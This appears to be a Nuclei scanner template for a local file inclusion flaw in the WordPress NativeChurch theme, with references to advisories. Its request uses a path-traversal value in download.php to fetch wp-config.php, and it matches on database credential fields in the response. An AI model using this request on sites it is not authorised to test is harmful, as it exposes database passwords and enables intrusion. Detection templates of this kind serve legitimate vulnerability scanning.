id: nativechurch-wp-theme-lfd info: name: WordPress NativeChurch Theme - Local File Inclusion author: 0x_Akoko severity: high description: | WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file. reference: - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html - https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1 tags: wp-theme,lfi,wp,packetstorm,wpscan,wordpress requests: - method: GET path: - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_HOST" - "The base configurations of the WordPress" condition: and # Enhanced by mp on 2022/07/29